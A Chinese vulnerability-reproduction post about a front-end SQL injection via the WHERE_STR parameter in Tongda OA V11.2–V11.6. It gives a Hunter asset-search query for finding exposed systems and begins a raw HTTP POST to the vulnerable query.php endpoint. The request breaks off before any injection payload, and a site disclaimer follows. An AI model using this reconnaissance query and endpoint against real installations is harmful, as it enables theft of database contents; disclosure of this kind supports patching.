【漏洞复现-通达OA】通达OA WHERE_STR 存在前台SQL注入漏洞

news2024/11/24 14:37:35

一、漏洞简介

通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。通达OA WHERE_STR存在前台SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

● 通达OA V11.2-通达V11.6

三、资产测绘

● hunterapp.name="通达 OA"
● 特征
在这里插入图片描述

四、漏洞复现

POST /general/management_center/portal/oa_engine/engine_manage_bulletin_number/query.php HTTP/1.1
Host: {hostname}
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=a817a534f7c99980f8be6ad061b4c2cb; USER_NAME_COOKIE=admin; OA_US

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1457480.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！